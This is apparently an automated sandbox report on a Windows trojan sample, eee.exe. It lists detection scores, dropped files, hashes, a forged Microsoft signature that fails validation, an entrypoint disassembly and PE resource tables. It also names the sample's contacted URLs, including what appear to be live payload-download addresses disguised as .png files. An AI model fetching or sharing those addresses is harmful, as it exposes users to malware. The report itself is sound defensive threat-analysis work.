C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
eee.exe	13%	ReversingLabs	Win32.Trojan.Ulise
eee.exe	15%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\igwjsumi	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://stable3download.ocmtancmi2c5t.website/httpbin/1370699322.png	0%	Avira URL Cloud	safe
https://stable4download.ocmtancmi2c5t.website/Q	0%	Avira URL Cloud	safe
https://stable4download.ocmtancmi2c5t.website/httpbin/1370699322.png	0%	Avira URL Cloud	safe
https://stable4download.ocmtancmi2c5t.website/h	0%	Avira URL Cloud	safe
https://stable4download.ocmtancmi2c5t.website/httpbin/1370699322.pnge	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
stable4download.ocmtancmi2c5t.website	172.67.157.22	true	false	unknown
www.wildberries.ru	185.138.252.1	true	false	high
wildberries.ru	185.138.252.1	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://stable4download.ocmtancmi2c5t.website/httpbin/1370699322.png	false	Avira URL Cloud: safe	unknown
https://www.wildberries.ru/update2/update.json	false		high
https://wildberries.ru/update2/update.json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.wildberries.ru/	eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.vmware.com/0	eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wildberries.ru/update2/update.jsonIFFIMAGEPVWndProcSubClassOriginalWindowClassSizingWindowMo	eee.exe	false		high
http://www.info-zip.org/	eee.exe, 00000001.00000002.1064267854.00000000031A2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.000000000564E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.000000000509A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.vmware.com/0/	eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stable4download.ocmtancmi2c5t.website/h	eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	eee.exe, 00000001.00000002.1064267854.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000002.00000002.1232413593.0000000005696000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.1232616582.00000000050E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stable3download.ocmtancmi2c5t.website/httpbin/1370699322.png	eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wildberries.ru/update2/update.jsonLocationETagAuthentication-InfoAgeAccept-RangesLast-Mo	eee.exe, 00000001.00000003.1038721876.0000000000525000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stable4download.ocmtancmi2c5t.website/Q	eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wildberries.ru/update2/update.jsoni	eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stable4download.ocmtancmi2c5t.website/httpbin/1370699322.pnge	eee.exe, 00000001.00000002.1063457757.00000000004D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.22	stable4download.ocmtancmi2c5t.website	United States		13335	CLOUDFLARENETUS	false
185.138.252.1	www.wildberries.ru	Russian Federation		15879	KPN-INTERNEDSERVICESNL	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1314331
Start date and time:	2023-09-26 09:46:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10, Office Professional Plus 2016, Chrome 115, Firefox 115, Adobe Reader 23, Java 8 Update 381
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	eee.exe
Detection:	MAL
Classification:	mal68.evad.winEXE@6/3@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 23 Number of non-executed functions: 57
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.137.106.217
Excluded domains from analysis (whitelisted): geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, atm-settingsfe-prod-geo2.trafficmanager.net, settings-prod-wus2-1.westus2.cloudapp.azure.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:46:54	API Interceptor	3x Sleep call for process: eee.exe modified
09:47:03	API Interceptor	3x Sleep call for process: cmd.exe modified

Process:	C:\Users\user\Desktop\eee.exe
File Type:	data
Category:	dropped
Size (bytes):	1050541
Entropy (8bit):	7.689759855011258
Encrypted:	false
SSDEEP:	24576:5/JZtA3ut2BGciRp6G5VMRGwrQ9wXPTi+tVr0noLCS5Gmp+LZBd:RJZtoBGL6GPyRtZmoLCSGS+rd
MD5:	C33F62688107DB6D2C16362ABD5FEB47
SHA1:	565255874972C66AE3A4ADFA9D37E2213127DDB9
SHA-256:	288F242A87BF7C2A195DEC4CBD44194AB3EAA30953B55A6E7BC872267BC28357
SHA-512:	052F361EF72A2264DDB7DC0247DF6D9A6A170AA210EB679E9F1779B6E3FBA23F6E5353860F7C23909153BFEF169D79FF87D092282A393A9543762F7CFAD01EA8
Malicious:	false
Reputation:	low
Preview:	..D...D...D...D...D..D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D....]...L...d..+~..0Q..*i..7Q..%....h...]..#...7Q..%...4...D...D...D...D...D...D...D...D...D...D...D....c..-l..>h..D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D.......0h..7y..'h..D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D....C...(..-n..7b..jC...K..)h..6f..D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D..j=..t:..D...D...D...D...D...D...D...D...D...D...D.

C:\Users\user\AppData\Local\Temp\igwjsumi

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	489984
Entropy (8bit):	6.77564214308669
Encrypted:	false
SSDEEP:	12288:BsAA+RVy+MBlSPyJVuoBa8YyANOV5qp1o0V8:B7Auy/Bl6gVJa8fJV5Ht
MD5:	DE1514AD72E115EB4DCD23EE662E2360
SHA1:	413BABAD417D7CE6F2AD74FC2626A65832B26EBE
SHA-256:	37A0C3CF4D8E3C2938AE4EBF1B8C27B8AD11732BD91844BA9591BE91154B0E9F
SHA-512:	CD61B0D45F3D7BDC14085168D573938AB6A9C202E2E968D35CB49AAF14C5DB6E709E5B77073C0449315E0331C9783F56315ECC32086ABCF3C47278A0D08A5DB5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....k\.................f...........8............@.......................................@..................................$...............................p......................................(................'..<............................text....e.......f.................. ..`.rdata...............j..............@..@.data...2 ...@..."...(..............@....reloc.......p... ...J..............@..Bueaa.................j..............@...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JWMACKAFRTBA\BGBUIPGHWHW

Download File

Process:	C:\Users\user\Desktop\eee.exe
File Type:	data
Category:	dropped
Size (bytes):	928993
Entropy (8bit):	7.941583400687358
Encrypted:	false
SSDEEP:	24576:CDpTPvPqIY8pymthWi5GUcNBZr95Mn2IVJMG:CJYejhn5DY7O2IVJZ
MD5:	77332C6BB519670EABB05A0FDD50676F
SHA1:	4CC8B15C428649A9388A1FD0DE347E1C9FD29C86
SHA-256:	7A2B271E3F60A4AAB8652239F95307D97D3075830166C147F8C4C346AC28876A
SHA-512:	147E501C8829F2C5CA9ECEEE1E9051E14F88B9930734EBAEB4697FE79C3FFCF8CCB150D40B7EF7E243D40A083C38DE275A4B0FA9C31018E7CF6A1615BC3563DC
Malicious:	false
Reputation:	low
Preview:	6........................t..........y.@.yr./................A........Rj/d.b...I>\|...#.TXu.ss...D.x-",i.g..v.....b....j..K..&...t..........-P.9..x....,.x7P7.EItA-.%k.....g.O.f......l.\|.@u.iK.Y,K.}9d..O.v.-O}=f.B.......{s..B.....+H.9JPwz..Hx"X.R..NR..\..,.W....y.FR..k%>..7...r..!...[.!..Rf.].L..8."..".-K..0nGF.. .Fq./n....B....:...}<.5..W...9.....^.u.Z.d..c.zG.'.l.{..on.0f.K..LF .r$...+..,Oo...`..R...M1z.g.s...."..`.J.).....uF..D.f..wt8e...+..tC^.....t.q..>.f..."=U<z......J{.1....@..\|...9....:.E..d...9u.RkiuEe2.G{..I..m.....u.YV.<....+{.r......Fd#.mE..6...../...1..>...%.Q....g.[..f..7..a._at7.14..2;5.O...M..K..!....;[p.u....9.T.B...9..@.,........@d.+p.xl..u...!.A.}i...I.KR.$.......O@>"..!.&...X..:....Z......e.....[.;..X&z..Z.>....E6x.z...Z....w.?.B.d"...u.=....L..xd*\|..g.@s.4Z....'8........G.<....+.......GpB...Q3v@ ....(tX9.}...1@....E..4....).2.S.......{.Q...:....U.B...G...s<..{5..gJpD?...+#DXF.. .....u.....p.g"@'....V.5^....kWe

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.778113900351409
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	eee.exe
File size:	458'592 bytes
MD5:	89f71046c8298c6ef2db92fe202f9b43
SHA1:	1fad31eedaa7437e96f9a13f60e85c1d14afa08f
SHA256:	6a096c8158da4e2453ba68fe0f780c2e4181c01f125d7831fc5d58a77faf792c
SHA512:	972abc83a524cca9ac8c326c2d4e8cc49f4b877965ba6bce941b7a1b13ae7fd4306cffdb63e1bcbede44aca7a515a13d67db77045e502e8424e9d7d95e95a2d4
SSDEEP:	6144:PW/OU+cR2lBLVa8MK1hmcRwpq/JiTTUh/:eR2jLt1hmcRwpq/JiTTUh/
TLSH:	BBA40792F349D4A9C5054171CC23CE683B66ED5946620A4B76EE3B2E9DF334318ABC4F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J&..+H\.+H\.+H\.#!\.+H\}<G\.+H\p#.\.+H\..Q\.+H\).T\.+H\.#.\.+H\.+I\'+H\p#.\.+H\}<(\.+H\}<.\h+H\}<.\.+H\. .\.+H\}<.\.+H\Rich.+H

File Icon


Icon Hash:	62d08c94b4b48c95

Static PE Info

General

Entrypoint:	0x40f0bd
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x47195FFE [Sat Oct 20 01:55:10 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	0ac89bf4c3b119bb84d272e9384cda6a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	07/12/2009 23:40:29 07/03/2011 23:40:29
Subject Chain	CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	E3FEDB37F4874E84CDB82A789FFDCD67
Thumbprint SHA-1:	9617094A1CFB59AE7C1F7DFDB6739E4E7C40508F
Thumbprint SHA-256:	277D42066A68326BA10B1874D393327404287C14A9C9DB1C09D50698952A17DD
Serial:	6101CF3E00000000000F

Entrypoint Preview

Instruction
push 00000060h
push 004189C0h
call 00007F95D0F2B184h
mov edi, 00000094h
mov eax, edi
call 00007F95D0F2AE60h
mov dword ptr [ebp-18h], esp
mov esi, esp
mov dword ptr [esi], edi
push esi
call dword ptr [004181ACh]
mov ecx, dword ptr [esi+10h]
mov dword ptr [0041C4CCh], ecx
mov eax, dword ptr [esi+04h]
mov dword ptr [0041C4D8h], eax
mov edx, dword ptr [esi+08h]
mov dword ptr [0041C4DCh], edx
mov esi, dword ptr [esi+0Ch]
and esi, 00007FFFh
mov dword ptr [0041C4D0h], esi
cmp ecx, 02h
je 00007F95D0F2AB6Eh
or esi, 00008000h
mov dword ptr [0041C4D0h], esi
shl eax, 08h
add eax, edx
mov dword ptr [0041C4D4h], eax
xor esi, esi
push esi
mov edi, dword ptr [00418080h]
call edi
cmp word ptr [eax], 5A4Dh
jne 00007F95D0F2AB81h
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 00004550h
jne 00007F95D0F2AB74h
movzx eax, word ptr [ecx+18h]
cmp eax, 0000010Bh
je 00007F95D0F2AB81h
cmp eax, 0000020Bh
je 00007F95D0F2AB67h
mov dword ptr [ebp-1Ch], esi
jmp 00007F95D0F2AB89h
cmp dword ptr [ecx+00000084h], 0Eh
jbe 00007F95D0F2AB54h
xor eax, eax
cmp dword ptr [ecx+000000F8h], esi
jmp 00007F95D0F2AB70h
cmp dword ptr [ecx+74h], 0Eh
jbe 00007F95D0F2AB44h
xor eax, eax
cmp dword ptr [ecx+000000E8h], esi
setne al
mov dword ptr [ebp-1Ch], eax

Rich Headers

Programming Language:

[ASM] VS2003 (.NET) SP1 build 6030
[C++] VS2003 (.NET) SP1 build 6030
[ C ] VS2003 (.NET) SP1 build 6030
[EXP] VS2003 (.NET) SP1 build 6030
[RES] VS2003 (.NET) build 3077
[LNK] VS2003 (.NET) SP1 build 6030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1ae60	0x73	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19ea0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e000	0x508b5	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x6e7b0	0x17b0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x182f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x19b88	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x18000	0x2e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16855	0x17000	False	0.5834854789402174	data	6.7928466301276815	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x2ed3	0x3000	False	0.428466796875	data	5.408214459070589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x2f44	0x1000	False	0.381103515625	Matlab v4 mat-file (little endian) \354MA, numeric, rows 4257078, columns 0	3.4058399780902033	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1e000	0x508b5	0x51000	False	0.10295801986882716	data	5.081349592476544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1f4a4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.47494669509594883
RT_ICON	0x2034c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6096570397111913
RT_ICON	0x20bf4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7290462427745664
RT_ICON	0x2115c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.29097510373443985
RT_ICON	0x23704	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3691369606003752
RT_ICON	0x247ac	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3599290780141844
RT_ICON	0x24c14	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.4520255863539446
RT_ICON	0x25abc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.5870938628158845
RT_ICON	0x26364	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7471098265895953
RT_ICON	0x268cc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.23381742738589212
RT_ICON	0x28e74	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3271575984990619
RT_ICON	0x29f1c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5585106382978723
RT_ICON	0x2a384	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.49600213219616207
RT_ICON	0x2b22c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6069494584837545
RT_ICON	0x2bad4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x2c03c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.2550829875518672
RT_ICON	0x2e5e4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.35154784240150094
RT_ICON	0x2f68c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x2faf4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.48134328358208955
RT_ICON	0x3099c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.60514440433213
RT_ICON	0x31244	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x317ac	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.24927385892116183
RT_ICON	0x33d54	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3482645403377111
RT_ICON	0x34dfc	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x35264	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.48880597014925375
RT_ICON	0x3610c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6114620938628159
RT_ICON	0x369b4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x36f1c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.2550829875518672
RT_ICON	0x394c4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.35553470919324576
RT_ICON	0x3a56c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x3a9d4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.4946695095948827
RT_ICON	0x3b87c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6128158844765343
RT_ICON	0x3c124	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x3c68c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.25964730290456434
RT_ICON	0x3ec34	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3548311444652908
RT_ICON	0x3fcdc	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x40144	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.48507462686567165
RT_ICON	0x40fec	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6074007220216606
RT_ICON	0x41894	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x41dfc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.25280082987551866
RT_ICON	0x443a4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.349671669793621
RT_ICON	0x4544c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x458b4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.488272921108742
RT_ICON	0x4675c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6074007220216606
RT_ICON	0x47004	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x4756c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.25280082987551866
RT_ICON	0x49b14	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3545966228893058
RT_ICON	0x4abbc	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x4b024	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.4946695095948827
RT_ICON	0x4becc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6078519855595668
RT_ICON	0x4c774	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x4ccdc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.2545643153526971
RT_ICON	0x4f284	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.35060975609756095
RT_ICON	0x5032c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x50794	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.48880597014925375
RT_ICON	0x5163c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6078519855595668
RT_ICON	0x51ee4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x5244c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.254149377593361
RT_ICON	0x549f4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.350375234521576
RT_ICON	0x55a9c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x55f04	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.48667377398720685
RT_ICON	0x56dac	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6037906137184116
RT_ICON	0x57654	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x57bbc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.25155601659751037
RT_ICON	0x5a164	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.34896810506566606
RT_ICON	0x5b20c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x5b674	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.4957356076759062
RT_ICON	0x5c51c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.618231046931408
RT_ICON	0x5cdc4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x5d32c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.26224066390041495
RT_ICON	0x5f8d4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3581144465290807
RT_ICON	0x6097c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x60de4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.47654584221748403
RT_ICON	0x61c8c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.5992779783393501
RT_ICON	0x62534	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7528901734104047
RT_ICON	0x62a9c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.2465767634854772
RT_ICON	0x65044	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3409943714821764
RT_ICON	0x660ec	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x66554	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.48720682302771856
RT_ICON	0x673fc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6033393501805054
RT_ICON	0x67ca4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.7521676300578035
RT_ICON	0x6820c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.2525933609958506
RT_ICON	0x6a7b4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.350844277673546
RT_ICON	0x6b85c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6054964539007093
RT_ICON	0x6bcc4	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	United States	0.4864864864864865
RT_ICON	0x6bdec	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.48554913294797686
RT_ICON	0x6c354	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 768	English	United States	0.2981651376146789
